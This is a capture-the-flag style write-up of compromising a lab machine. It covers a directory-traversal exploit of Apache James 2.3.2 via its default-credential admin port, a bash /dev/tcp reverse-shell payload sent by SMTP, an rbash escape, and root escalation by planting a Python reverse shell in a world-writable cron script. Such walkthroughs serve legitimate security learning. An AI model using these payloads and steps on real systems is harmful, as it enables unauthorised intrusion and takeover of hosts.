Target: 10.129.8.75
Enumeration
Starting off with our initial nmap scan with version detection:
$ nmap -sSV -p- -oA 1_init_nmap 10.129.8.75
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-01 21:12 EDT
Nmap scan report for 10.129.8.75
Host is up (0.048s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp?
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3?
119/tcp open nntp?
4555/tcp open rsip?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have a number of open ports, with OpenSSH 7.4p1 on 22/tcp and Apache httpd 2.4.25 on 80/tcp. The remaining ports appear to not have fingerprinted confidentally.
25/tcp
Checking one of the first not-confident tcp ports, I attempted to pull the port with curl.
$ curl -IL 10.129.8.75:25
curl: (1) Received HTTP/0.9 when not allowed
Thinking it was an easy fix, I added --http0.9 as an arg, only to receive:
$ curl -IL --http0.9 10.129.8.75:25
curl: (8) Weird server reply
Finally stripping -IL out returns some useful information:
$ curl --http0.9 10.129.8.75:25
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Mon, 1 Jun 2026 21:26:54 -0400 (EDT)
I tested using netcat -C 10.129.8.75 25 using the VRFY command for enumeration and it says not allowed. Using an nmap script also fails, as it appears there is an unusually long pause in the beginning before something returns via the connection. Using searchsploit JAMES SMTP reveals a potential arbitrary file write / command exploit for Apache James Server 2.3.2, CVE-2015-7611. A write-up for this vulnerability reveals you must login to the admin panel, create a user with a directory traversal exploit adduser ../../../../../../../../etc/bash_completion.d exploit, and then send an email to this user with the command you want to execute. When any user signs in, it will execute.
4555/tcp
As seen in the write-up, this port is the administration port for Apache James. The write-up also states that this software ships with the default credentials root:root. Sure enough, it worked and we were able to use the command to create an exploitable user
$ nc -C 10.129.8.75 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
adduser ../../../../../../../../etc/bash_completion.d exploit
User ../../../../../../../../etc/bash_completion.d added
Exploitation
With the vulnerability discovered and prerequisite exploit user created, the final step is to send a payload to gain access to the machine.
$ nc -C 10.129.8.75 25
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Mon, 1 Jun 2026 21:57:02 -0400 (EDT)
HELO example.com
250 solidstate Hello example.com (x.x.x.x [x.x.x.x])
MAIL FROM:<[email protected]>
250 2.1.0 Sender <[email protected]> OK
RCPT TO: <../../../../../../../../etc/bash_completion.d>
250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
/bin/bash -i >& /dev/tcp/x.x.x.x/4444 0>&1
.
250 2.6.0 Message received
QUIT
221 2.0.0 solidstate Service closing transmission channel
The payload has been sent, however to trigger the reverse shell, it requires a user login. At this time, I don't have any other users, so back to enumeration.
Enumeration Pt 2
Port 80 hosts a simple website with the theme SolidState. I mapped the IP to the same solid-state-security.com seen in the footer, and attempted a vhost scan, but didn't return anything legitimate.
A second scan for gobuster dir -u http://solid-state-security.com -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -o 3_gobuster_dir.txt did not return anything new besides /assets and /images.
Attempting to connect to OpenSSH reveals a ** This session may be vulnerable to "store now, decrypt later" attacks. banner, which isn't really actionable. I tried some of the usernames from the admin mail server with various passwords such as mail, their own username, password, 1234 to no avail.
Port 119 can be connected via nc -C again and reveals it is an NNTP service, a posting framework that doesn't have anything interesting
Back on port 4555, logged in as root, we can type HELP and then listusers to reveal additional users james, thomas, john, mindy and mailadmin. I reset all of the passwords to password here.
Port 110 is a POP3 server. We can use USER <user> PASS password and list to check for emails.
James & Thomas have no emails. John has one, which we can get with RETR 1. It states to restrict mindy's access and send her a temp password. Switching to mindy's account, email 2 reveals a password of P@55W0rd1!2@
User Access
Upon logging in as mindy via SSH, I get spammed with a bunch of command not found messages. Looks like CVE-2015-7611 was a red herring and did not actually work here. Either way, user.txt is in our home directory.
I took a break for a day, so the IP from here on out has changed to 10.129.9.59. The IP in /etc/hosts has also been updated to reflect this change. My host IP also changed.
Credentialed Enumeration (rshell)
With user access as mindy, now we need to do further enumeration to determine how to privesc to root.
crontab -l--rbash: crontab: command not foundsudo -l--rbash: sudo: command not foundecho $SHELL-/bin/rbash
rbash is a new one for me, it's a restricted shell that prevents access to a set of whitelisted commands. ls -la ~/bin only contains cat, env and ls. Attempting to use / in a command is restricted.
Crucial commands such as bash, ftp, gdb, python, man, vim, find, scp, php, perl, ruby, lua, sh, zip, tar, which are all not found.
compgen -b reveals the binaries we have access to. There are not many. We also have some functions under compgen -A function. export -p shows our exported variables, and which are read-only. Unfortunately PATH and SHELL are readonly.
We are able to cat /etc/passwd which reveals a james that has bash as default shell instead of rbash. Maybe the secret is to use a different username exploit than I did for CVE-2015-7611 as the /etc/bash_completion.d functionality is set to disabled in our .bashrc via the shopt -u progcomp line. Though I also see shopt -u mailwarn set to disable mail checking?
Credentialed Enumeration (bash)
I ended up going back to my original payload above and sending an apostrophe ' before the actual command and it latched this time when mindy logged in. I see whoami finally works, indicating we seem to have somewhat further perms even though $SHELL indicates /bin/rbash.
I was able to cd /bin and exec bash. Using ./ps -p $$ indicates we are in bash.
I got lucky here by checking /opt first, a common place for user installed applications. I see the james-2.3.2 dir, but also a tmp.py owned by root but writable by anyone.
First, need to elevate from the dumb nc shell to an interactive tty. I followed the steps documented on my hackbook here.
Priv Esc
Once active, I ran nano tmp.py to edit.
I modified the script to look as follows:
import os
import sys
import pty
import socket
try:
s=socket.socket();s.connect(("x.x.x.x",4440));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")
except:
sys.exit()
I also launched the listener with nc -lvnp 4440
Unfortunately, launching the script ourselves still keeps it as mindy. While I was searching online to figure out a way to privesc, the listener capture the session as root!
Root
As root, we get the flag here under /root/root.txt. Also crontab -l shows every 3 minutes the python /opt/tmp.py script is called.
Conclusion
This was a pretty challenging box for me, but I learned a lot about exploiting SMTP and escaping a restricted shell. I was actually on the right track and had initially sent the payload before I ever logged in as mindy, but my payload wasn't properly formed and failed to capture the reverse shell. It took me a bit of stumbling before I determined I needed to fix the payload for it to latch.
Escalation to root once the revshell in bash existed wasn't so bad. I got lucky stumbling into the file in /opt quickly.